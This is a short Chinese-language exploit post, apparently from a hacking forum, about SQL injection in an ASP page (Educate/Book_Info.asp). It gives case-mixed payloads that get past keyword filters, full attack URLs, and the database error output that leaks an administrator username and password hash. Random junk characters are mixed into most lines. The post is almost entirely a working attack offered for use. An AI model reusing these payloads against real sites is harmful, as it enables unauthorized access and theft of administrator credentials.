漏洞出现在Educate/Book_Info.asp % ^1 {4 h0 f9 p+ Y u+ d: ^8 g8 b
7 X* N Q6 o3 ^此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
0 @3 @ W1 u8 {' y/ L8 o d1 U3 m
6 C) u0 L) m. G- q6 E4 \0 `exp:如下$ h4 R. p/ V: ~% v
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
0 q, j6 p# e" Q查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
( u9 d4 q( Y0 B2 y! Y1 d
' O; X: f% Z4 n+ Z5 h1 Rhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper) W, ]7 i/ e9 w) K6 g M. ?
$ n: g; H7 w4 VMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
7 |" x T6 t/ j7 c0 B
3 U6 K1 `- R) S; l* `& Q$ o将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。, I9 X7 h* @- y5 l0 X, S
% r) R9 b7 y' J9 ^- c; a/Educate/Book_Info.asp,行 8 E' }+ s& D# |: r: c8 W
0 H- ~6 }$ l* m/ Q: }% |1 Ehttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
0 O2 C& n0 h3 S8 L. c 6 [. t0 ]( j! i1 i7 {
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'& K$ ?, y" C0 O2 W: Y' f
1 ~! t! }( O( q" e/ e7 ~4 G
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
- ?' \, u2 Q7 @5 K
& _3 n) S) @2 k' w$ M/Educate/Book_Info.asp,行 8
m6 d! u3 e' l |